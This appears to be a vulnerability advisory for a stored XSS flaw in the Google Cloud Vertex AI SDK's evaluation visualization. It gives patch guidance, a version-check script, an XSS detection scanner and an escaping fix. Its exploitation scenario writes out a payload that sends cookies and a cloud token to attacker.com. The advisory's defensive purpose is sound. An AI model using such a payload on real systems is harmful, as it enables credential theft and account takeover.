CVE-2026-2472

GHSA-qv8j-hgpc-vrq8 HIGH
Published February 20, 2026
CISO Take

If your ML engineers use Vertex AI SDK's evaluation visualization in Jupyter or Colab, upgrade google-cloud-aiplatform to 1.131.0 immediately. An attacker who can influence model evaluation inputs or dataset content can execute arbitrary JavaScript in your engineers' browser sessions, enabling cloud credential theft and account takeover. Risk is highest for teams evaluating LLMs against external, user-supplied, or third-party data sources—a public PoC already exists on GitHub.

Affected Systems

Package                    Ecosystem   Vulnerable Range        Patched
google-cloud-aiplatform    pip         >= 1.98.0, < 1.131.0    1.131.0

If you use google-cloud-aiplatform at any version in the range above, you are affected.
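Exposure across environments can be confirmed programmatically by comparing the installed version against the vulnerable range. A minimal sketch using only the standard library (the range check is illustrative and does not handle pre-release suffixes such as "rc1"):

```python
from importlib.metadata import version, PackageNotFoundError


def in_vulnerable_range(ver: str) -> bool:
    """True if ver falls in [1.98.0, 1.131.0). Naive parse: major.minor.patch only."""
    parts = tuple(int(p) for p in ver.split(".")[:3])
    return (1, 98, 0) <= parts < (1, 131, 0)


def is_vulnerable(pkg: str = "google-cloud-aiplatform") -> bool:
    """Check the locally installed package, if present."""
    try:
        return in_vulnerable_range(version(pkg))
    except PackageNotFoundError:
        return False  # not installed in this environment


if __name__ == "__main__":
    print("vulnerable" if is_vulnerable() else "not affected")
```

Running this in each notebook environment (or CI image) gives a quick inventory; `pip show google-cloud-aiplatform` is the manual equivalent.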

Severity & Risk

CVSS 3.1: N/A
EPSS: 0.1% chance of exploitation in 30 days
KEV Status: Not in KEV
Sophistication: Moderate

Recommended Action

  1. PATCH (immediate): Upgrade google-cloud-aiplatform to >= 1.131.0 (pip install --upgrade google-cloud-aiplatform). Verify with pip show google-cloud-aiplatform.
  2. WORKAROUND: Until patched, prohibit use of _genai/_evals_visualization with evaluation results sourced from untrusted, external, or user-supplied data.
  3. DETECTION: Scan evaluation datasets and model outputs for script tags, JavaScript event handlers (onerror, onload, onclick), and javascript: URI schemes before visualization. Add pre-render output sanitization.
  4. INPUT CONTROL: Treat all external data sources fed into evaluation pipelines as untrusted; apply allowlist-based content validation.
  5. CREDENTIAL HYGIENE: If exposure is suspected, rotate Google Cloud service account keys, OAuth tokens, and API keys stored in any potentially affected Jupyter/Colab sessions.
  6. SCOPE: Check all repositories and CI/CD pipelines that run evaluation notebooks for the vulnerable SDK version range.
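The detection step above can be sketched as a pre-render scan over parsed evaluation JSON. This is a minimal illustrative check, not a complete XSS filter; the patterns cover only the indicators named in the advisory (script tags, onerror/onload/onclick handlers, javascript: URIs):

```python
import json
import re

# Indicators named in the detection guidance; extend as needed.
XSS_PATTERNS = [
    re.compile(r"<\s*script", re.IGNORECASE),                     # script tags
    re.compile(r"\bon(?:error|load|click)\s*=", re.IGNORECASE),   # event handlers
    re.compile(r"javascript\s*:", re.IGNORECASE),                 # javascript: URIs
]


def find_suspicious_strings(obj, path="$"):
    """Recursively walk parsed JSON, yielding (json_path, value) for risky strings."""
    if isinstance(obj, str):
        if any(p.search(obj) for p in XSS_PATTERNS):
            yield (path, obj)
    elif isinstance(obj, dict):
        for k, v in obj.items():
            yield from find_suspicious_strings(v, f"{path}.{k}")
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            yield from find_suspicious_strings(v, f"{path}[{i}]")


# Example: a dataset row carrying an event-handler payload is flagged.
sample = json.loads('{"rows": [{"response": "<img src=x onerror=alert(1)>"}]}')
hits = list(find_suspicious_strings(sample))
```

Pattern matching of this kind is a detection aid only; it flags obvious payloads for triage but a determined attacker can encode around it, so it complements rather than replaces output sanitization at render time.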

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.6.2.3 - AI system inputs
A.6.2.6 - AI system security
A.8.4 - AI data quality and integrity
NIST AI RMF
GOVERN 6.1 - Policies and procedures are in place that address AI risks associated with third-party entities
MANAGE 2.2 - Mechanisms are in place and applied to sustain the value of deployed AI systems
OWASP LLM Top 10
LLM02 - Insecure Output Handling

Technical Details

NVD Description

Stored Cross-Site Scripting (XSS) in the _genai/_evals_visualization component of the Google Cloud Vertex AI SDK (google-cloud-aiplatform), versions from 1.98.0 up to (but not including) 1.131.0, allows an unauthenticated remote attacker to execute arbitrary JavaScript in a victim's Jupyter or Colab environment by injecting script escape sequences into model evaluation results or dataset JSON data.

Exploitation Scenario

An attacker targets a company running LLM evaluations on Vertex AI. They submit an adversarial evaluation dataset entry with a JSON string value containing a stored XSS payload: '<img src=x onerror=fetch("https://attacker.com/exfil?t="+btoa(document.cookie+localStorage.getItem("gcloud_token")))>'. The poisoned dataset is fed into a Vertex AI model evaluation job. When the ML engineer opens the _genai/_evals_visualization dashboard in Jupyter to review results, the payload fires silently, exfiltrating the engineer's Google Cloud OAuth token and session cookies to the attacker. The attacker uses the stolen token to authenticate to GCS, enumerate Vertex AI model artifacts, and pivot to Cloud SQL or BigQuery—all without triggering authentication alerts, since they are using a legitimate token.
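The payload in this scenario only fires because the string is rendered into the visualization HTML verbatim. The general fix class is output encoding before render; a minimal sketch using the standard library (illustrative of the mitigation category, not a claim about the exact change shipped in 1.131.0):

```python
import html

# Simplified stand-in for the payload described in the scenario above.
payload = '<img src=x onerror=fetch("https://attacker.example/exfil")>'

# HTML-escaping before interpolation into the page turns markup into inert
# text: the browser displays the string instead of creating an <img> element,
# so the onerror handler never executes.
safe = html.escape(payload)
```

The same principle applies to any notebook widget that interpolates model outputs or dataset fields into HTML: encode at the point of render, regardless of any upstream filtering.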

Timeline

Published
February 20, 2026
Last Modified
February 27, 2026
First Seen
March 24, 2026